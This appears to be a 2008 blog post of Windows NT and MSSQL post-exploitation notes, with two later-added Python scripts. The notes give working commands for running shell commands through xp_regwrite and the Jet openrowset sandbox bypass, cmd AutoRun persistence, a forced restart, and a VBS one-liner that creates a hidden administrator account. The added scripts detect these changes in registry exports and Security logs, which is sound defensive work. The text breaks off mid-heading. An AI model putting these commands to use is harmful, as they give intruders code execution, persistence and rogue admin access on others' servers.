7/08/2008

Some notes about the Windows NT operating system

Set an auto-exec script that runs whenever a command shell opens:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\AutoRun

The connection history of MSTSC (the Remote Desktop client):
HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default

When the shell or Regedit is disabled:
Run GPEDIT.MSC to open the Group Policy Editor > User Configuration > Administrative Templates > System > "Prevent access to the command prompt" policy, and set it to Not Configured.

Register the FileSystemObject (scrrun.dll) component:
RegSvr32 C:\WINNT\SYSTEM32\scrrun.dll /s

Execute a command with xp_regwrite only (without xp_cmdshell):

select @@version
--check the version of this MSSQL database server first

dbcc addextendedproc ("xp_regwrite","xpstar.dll")
--restore xp_regwrite by using xpstar.dll if it does not exist
--MSSQL 2005 should use xpstar90.dll

exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
--write the value to the registry

select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd.exe /c YOUR COMMAND HERE")')
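The three registry locations mentioned above (the Command Processor AutoRun value, the MSTSC MRU history, and the Jet SandBoxMode value) are worth checking on any host under investigation. The following is an added example, not code from the original post: it parses the text form of a `regedit /e` export (real exports are UTF-16LE and need decoding first) and reports each of those locations. The export contents are constructed sample data, and the reading of SandBoxMode values 0 and 1 as "non-Access callers such as SQL Server are not sandboxed" is an assumption based on the documented meaning of that key.

```python
import re

# Constructed sample of a regedit /e export, already decoded to text.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]
"AutoRun"="cmd.exe /c start /b wscript.exe C:\\Temp\\x.vbs"
"CompletionChar"=dword:00000009

[HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default]
"MRU0"="192.0.2.10"
"MRU1"="fileserver.example.test"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Jet\4.0\Engines]
"SandBoxMode"=dword:00000001
"MaxBufferSize"=dword:00000000
'''

AUTORUN_KEYS = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor",
    r"HKEY_CURRENT_USER\Software\Microsoft\Command Processor",
)
MSTSC_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"
JET_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Jet\4.0\Engines"

_VALUE_LINE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def _unescape(s):
    # .reg string data escapes backslash and double quote with a backslash.
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text):
    """Return {key_path: {value_name: (type_tag, data)}} from regedit /e text."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        if current is None:
            continue
        m = _VALUE_LINE.match(line)
        if not m:
            continue  # binary/hex continuation lines are not needed here
        name = m.group(1) if m.group(1) is not None else "(Default)"
        data = m.group(2)
        if data.startswith('"') and data.endswith('"'):
            keys[current][name] = ("REG_SZ", _unescape(data[1:-1]))
        elif data.lower().startswith("dword:"):
            keys[current][name] = ("REG_DWORD", int(data[6:], 16))
        else:
            keys[current][name] = ("OTHER", data)
    return keys


def audit(keys):
    """Return a list of (finding, key_path, detail) tuples for the three locations."""
    findings = []
    # 1. Any non-empty AutoRun value runs every time cmd.exe starts.
    for k in AUTORUN_KEYS:
        v = keys.get(k, {}).get("AutoRun")
        if v and str(v[1]).strip():
            findings.append(("cmd_autorun", k, v[1]))
    # 2. MRU0..MRUn hold the hosts this user connected to with MSTSC.
    mru = keys.get(MSTSC_KEY, {})
    hosts = [val for name, (_, val) in sorted(mru.items()) if name.upper().startswith("MRU")]
    if hosts:
        findings.append(("mstsc_history", MSTSC_KEY, hosts))
    # 3. Assumption: SandBoxMode 0 or 1 leaves non-Access callers unsandboxed.
    sb = keys.get(JET_KEY, {}).get("SandBoxMode")
    if sb and sb[0] == "REG_DWORD" and sb[1] in (0, 1):
        findings.append(("jet_sandbox_weak", JET_KEY, sb[1]))
    return findings


def audit_text(text):
    return audit(parse_reg_export(text))


if __name__ == "__main__":
    for finding, key, detail in audit_text(SAMPLE_REG):
        print(f"{finding:18} {key}\n    {detail}")
```

On a live host the same checks map directly onto `reg query` of the three paths; the parser here only exists so the audit can run against an offline export collected from an image.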



Restart Windows:
echo @ECHO OFF ^& cd/d %temp% ^& echo [version] ^> {out}.inf>a.bat
echo (set inf=InstallHinfSection DefaultInstall)>>a.bat
echo echo signature=$chicago$ ^>^> {out}.inf>>a.bat
echo echo [defaultinstall] ^>^> {out}.inf>>a.bat
echo rundll32 setupapi,%inf% 1 %temp%\{out}.inf>>a.bat
a.bat

Add an administrator user account without net1.exe:
echo dim username,password:If Wscript.Arguments.Count > 0 Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="5he11":password="123456":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"^&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os^&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os^&"/"^&username^&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath >cz.vbs
cscript cz.vbs
del cz.vbs
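Creating a local account through ADSI and adding it to Administrators, as the script above does, still produces the standard Security log events: an account-created event (624 on NT/2000/2003, 4720 on Vista/2008 and later) followed by a member-added-to-local-group event (636, later 4732). The following is an added example, not code from the original post: it correlates the two events over a CSV export of the Security log. The column names and the log rows are constructed sample data, and the ten-minute correlation window is an assumption.

```python
import csv
import io
from datetime import datetime, timedelta

# Constructed sample of a Security log export; column names are assumed,
# and the member field is simplified to a user name (real 4732 events carry a SID).
SAMPLE_CSV = """TimeCreated,EventId,SubjectUserName,TargetUserName,TargetGroup
2008-07-08 10:15:02,4720,websvc,5he11,
2008-07-08 10:15:03,4732,websvc,5he11,Administrators
2008-07-08 11:40:10,4720,helpdesk,jdoe,
2008-07-08 13:02:44,4732,helpdesk,jdoe,Remote Desktop Users
2008-07-08 14:00:00,636,SYSTEM,svc_backup,Administrators
"""

# Pre-Vista and post-Vista IDs for the same two audit events.
CREATED = {"624", "4720"}
ADDED_TO_LOCAL_GROUP = {"636", "4732"}


def _load(csv_text):
    rows = list(csv.DictReader(io.StringIO(csv_text)))
    for r in rows:
        r["ts"] = datetime.strptime(r["TimeCreated"], "%Y-%m-%d %H:%M:%S")
    return rows


def find_new_admin_accounts(csv_text, window=timedelta(minutes=10)):
    """Pair each account-created event with an Administrators add for the same
    user inside `window`; each pair is a new local admin worth reviewing."""
    rows = _load(csv_text)
    adds = [r for r in rows if r["EventId"] in ADDED_TO_LOCAL_GROUP
            and r["TargetGroup"].strip().lower() == "administrators"]
    alerts = []
    for c in rows:
        if c["EventId"] not in CREATED:
            continue
        for a in adds:
            if (a["TargetUserName"] == c["TargetUserName"]
                    and timedelta(0) <= a["ts"] - c["ts"] <= window):
                alerts.append({
                    "user": c["TargetUserName"],
                    "created_by": c["SubjectUserName"],
                    "created": c["TimeCreated"],
                    "elevated": a["TimeCreated"],
                })
    return alerts


def find_admin_adds_without_creation(csv_text):
    """Administrators adds for accounts with no creation event in the export:
    an existing account being elevated, which deserves a separate review."""
    rows = _load(csv_text)
    created = {r["TargetUserName"] for r in rows if r["EventId"] in CREATED}
    return [r["TargetUserName"] for r in rows
            if r["EventId"] in ADDED_TO_LOCAL_GROUP
            and r["TargetGroup"].strip().lower() == "administrators"
            and r["TargetUserName"] not in created]


if __name__ == "__main__":
    for alert in find_new_admin_accounts(SAMPLE_CSV):
        print("new local admin:", alert)
    for user in find_admin_adds_without_creation(SAMPLE_CSV):
        print("existing account elevated:", user)
```

The account name 5he11 in the sample is the default the script above uses when no arguments are given; anything that creates and elevates an account within seconds, from a service or web account context, is the pattern the correlation is meant to surface.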



Change the password of SA on the MSSQL database server by using a SQL command:
